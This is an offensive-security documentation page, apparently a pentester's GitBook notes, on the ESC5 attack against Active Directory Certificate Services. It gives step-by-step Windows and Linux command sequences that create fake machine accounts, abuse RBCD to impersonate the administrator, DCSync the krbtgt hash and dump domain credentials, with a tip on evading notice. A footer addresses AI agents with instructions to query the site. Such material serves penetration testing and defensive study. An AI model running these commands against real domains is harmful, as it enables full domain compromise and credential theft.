# ESC5

**What is ESC5?**

ESC5 exploits **overly permissive ACLs on privileged AD CS objects** not on certificate templates themselves, but on the underlying PKI infrastructure objects:

| Vulnerable Object                   | Example Abuse                              |
| ----------------------------------- | ------------------------------------------ |
| CA server computer object           | RBCD / Shadow Credentials → admin access   |
| Certificate Templates container     | GenericWrite → create malicious templates  |
| Certification Authorities container | ACL misconfiguration → persistence         |
| NTAuthCertificates object           | Modify trusted CAs → domain persistence    |
| CA's RPC/DCOM server                | Reconfigure AD CS settings for later abuse |

Compromising the CA server gives full control over the PKI  enabling **domain persistence**, **golden certificate attacks**, and setting up further ESC abuses.

***

### Exploitation Using Windows

**Step 1 Identify RBCD Opportunities**

* Check if any user has sufficient permissions to configure RBCD on the CA server:

```cmd
Get-RBCD-Threaded.exe -d domain.corp
```

* You can also enumerate ACLs using **PowerView**, **AD Module**, or **BloodHound**.

You can also enumerate ACLs using **PowerView**, **AD Module**, or **BloodHound**.

***

**Step 2  Create a Fake Machine Account**

* By default, any domain user can create up to 10 computer accounts:

```cmd
SharpAllowedToAct.exe --computeraccountname FAKEMACHINE --computerpassword 'Passw0rd!' --targetcomputer cb-ca --domain abcd.corp -a dc01.abcd.corp
```

> **Tip:** In real assessments, name the fake computer something that blends in with existing naming conventions.

***

**Step 3  Compute the RC4 Hash**

```cmd
Rubeus.exe hash /password:'Passw0rd!'
```

***

**Step 4  Abuse RBCD to Impersonate Administrator**

* Request a service ticket for each required SPN and inject it:
* **CIFS** (file system access used to verify admin access):

```cmd
Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<RC4_HASH> /msdsspn:cifs/cb-ca.abcd.corp /impersonate:administrator /domain:abcd.corp /dc:dc01.abcd.corp /ptt
```

**HTTP** (for WinRM / remote management):

```cmd
Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<RC4_HASH> /msdsspn:http/cb-ca.abcd.corp /impersonate:administrator /domain:abcd.corp /dc:dc01.abcd.corp /ptt
```

**LDAP** (for DCSync):

```cmd
Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<RC4_HASH> /msdsspn:ldap/dc01.abcd.corp /impersonate:administrator /domain:abcd.corp /dc:dc01.abcd.corp /ptt
```

***

**Step 5  Verify Access**

```
klist
dir \\dc01.abcd.corp\c$
winrs -r:dc01.abcd.corp cmd.exe
```

***

**Step 6  Post-Compromise Options**

* Once you have admin access to the CA server, several paths open up:
* **DCSync (using LDAP ticket):**

```cmd
BetterSafetyKatz.exe "lsadump::dcsync /user:abcd\krbtgt /domain:abcd.corp" "exit"
BetterSafetyKatz.exe "lsadump::dcsync /user:abcd\administrator /domain:abcd.corp" "exit"
```

**Misconfigure a template for ESC4-style abuse:** Modify an existing template to be exploitable (see ESC4 notes).

**Golden Certificate attack:** Steal the root CA private key and forge certificates for any account persistent even after password resets.

***

### **Exploitation Using Linux**

**Step 1  Add a Fake Machine Account**

```bash
addcomputer.py -computer-name 'FAKEMACHINE02$' -computer-pass 'Passw0rd!' -dc-ip <DC_IP> -hashes :<NT_HASH> 'domain.corp/username'
```

**Step 2  Configure RBCD**

```bash
rbcd.py -dc-ip <DC_IP> -t cb-ca -f FAKEMACHINE02 -hashes :<NT_HASH> 'domain.corp/username'
```

**Step 3  Request a Service Ticket**

```bash
getST.py -spn cifs/cb-ca.domain.corp -impersonate administrator -dc-ip <DC_IP> 'domain.corp/FAKEMACHINE02$:Passw0rd!'
```

**Step 4  Load the Ticket & Execute**

```bash
export KRB5CCNAME=administrator.ccache
klist
wmiexec.py -dc-ip <DC_IP> -k -no-pass domain.corp/administrator@cb-ca.domain.corp
```

**Step 5  Dump Credentials**

```bash
secretsdump.py domain.corp/administrator@dc01.domain.corp -k -no-pass
```

***

### **Key Differences from Template-Based ESCs**

|                  | Template ESCs (ESC1–4)    | ESC5                                 |
| ---------------- | ------------------------- | ------------------------------------ |
| **Target**       | Certificate templates     | PKI infrastructure objects           |
| **Prerequisite** | Enroll rights on template | Write/GenericWrite on CA objects     |
| **Primary tool** | Certify / Certipy         | RBCD tools + Rubeus / Impacket       |
| **Impact**       | Certificate impersonation | Full CA control + domain persistence |

#### **Tools Reference**

| Tool                                                                                     | Platform | Purpose                                        |
| ---------------------------------------------------------------------------------------- | -------- | ---------------------------------------------- |
| [Get-RBCD-Threaded](https://github.com/FatRodzianko/Get-RBCD-Threaded/releases/tag/1.05) | Windows  | Enumerate RBCD opportunities                   |
| [SharpAllowedToAct](https://github.com/pkb1s/SharpAllowedToAct)                          | Windows  | Configure RBCD / create machine accounts       |
| [Rubeus](https://github.com/GhostPack/Rubeus/releases/tag/1.6.4)                         | Windows  | Compute hashes, S4U2Self/Proxy, inject tickets |
| [BetterSafetyKatz](https://github.com/Flangvik/BetterSafetyKatz)                         | Windows  | DCSync via Mimikatz wrapper                    |
| [addcomputer.py](https://github.com/fortra/impacket/blob/master/examples/addcomputer.py) | Linux    | Add fake machine account                       |
| [rbcd.py](https://github.com/AlteredSecurity/RBCD)                                       | Linux    | Configure RBCD delegation                      |
| [getST.py](https://github.com/fortra/impacket/blob/master/examples/getST.py)             | Linux    | Request service ticket via S4U                 |
| [wmiexec.py](https://github.com/fortra/impacket/blob/master/examples/wmiexec.py)         | Linux    | Remote execution using Kerberos ticket         |
| [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) | Linux    | Dump credentials post-compromise               |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/active-directory-certificate-services-ad-cs/esc5.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.